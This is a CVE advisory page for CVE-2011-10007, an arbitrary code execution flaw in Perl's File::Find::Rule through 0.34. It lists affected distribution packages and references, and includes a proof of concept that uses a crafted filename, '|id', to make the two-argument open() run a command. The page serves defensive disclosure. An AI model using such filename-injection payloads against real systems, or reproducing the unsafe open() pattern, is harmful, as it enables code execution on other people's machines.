High severity8.8NVD Advisory· Published Jun 5, 2025· Updated Jun 16, 2026
CVE-2011-10007
CVE-2011-10007
Description
File::Find::Rule through 0.34 for Perl is vulnerable to Arbitrary Code Execution when grep() encounters a crafted filename.
A file handle is opened with the 2 argument form of open() allowing an attacker controlled filename to provide the MODE parameter to open(), turning the filename into a command to be executed.
Example:
$ mkdir /tmp/poc; echo > "/tmp/poc/|id" $ perl -MFile::Find::Rule \ -E 'File::Find::Rule->grep("foo")->in("/tmp/poc")' uid=1000(user) gid=1000(user) groups=1000(user),100(users)
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
22(expand)+ 1 more
- (no CPE)
- (no CPE)range: <=0.34
- Range: <=0.34
- osv-coords19 versionspkg:rpm/almalinux/perl-File-Find-Rulepkg:rpm/opensuse/perl-File-Find-Rule&distro=openSUSE%20Leap%2015.6pkg:rpm/opensuse/perl-File-Find-Rule&distro=openSUSE%20Tumbleweedpkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Enterprise%20Storage%207.1pkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Linux%20Enterprise%20High%20Performance%20Computing%2015%20SP3-LTSSpkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Linux%20Enterprise%20High%20Performance%20Computing%2015%20SP4-ESPOSpkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Linux%20Enterprise%20High%20Performance%20Computing%2015%20SP4-LTSSpkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Linux%20Enterprise%20High%20Performance%20Computing%2015%20SP5-ESPOSpkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Linux%20Enterprise%20High%20Performance%20Computing%2015%20SP5-LTSSpkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Linux%20Enterprise%20Module%20for%20Basesystem%2015%20SP6pkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Linux%20Enterprise%20Module%20for%20Basesystem%2015%20SP7pkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Linux%20Enterprise%20Server%2015%20SP3-LTSSpkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Linux%20Enterprise%20Server%2015%20SP4-LTSSpkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Linux%20Enterprise%20Server%2015%20SP5-LTSSpkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Linux%20Enterprise%20Server%20for%20SAP%20Applications%2015%20SP3pkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Linux%20Enterprise%20Server%20for%20SAP%20Applications%2015%20SP4pkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Linux%20Enterprise%20Server%20for%20SAP%20Applications%2015%20SP5pkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Manager%20Proxy%204.3pkg:rpm/suse/perl-File-Find-Rule&distro=SUSE%20Manager%20Server%204.3
< 0.34-19.1.el9_6+ 18 more
- (no CPE)range: < 0.34-19.1.el9_6
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.350.0-1.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
- (no CPE)range: < 0.34-150000.3.3.1
Patches
Vulnerability mechanics
References
8- www.openwall.com/lists/oss-security/2025/06/05/4nvd
- www.openwall.com/lists/oss-security/2025/06/06/1nvd
- www.openwall.com/lists/oss-security/2025/06/06/3nvd
- github.com/richardc/perl-file-find-rule/commit/df58128bcee4c1da78c34d7f3fe1357e575ad56f.patchnvd
- github.com/richardc/perl-file-find-rule/pull/4nvd
- lists.debian.org/debian-lts-announce/2025/06/msg00006.htmlnvd
- metacpan.org/release/RCLAMP/File-Find-Rule-0.34/source/lib/File/Find/Rule.pmnvd
- rt.cpan.org/Public/Bug/Display.htmlnvd
News mentions
0No linked articles in our index yet.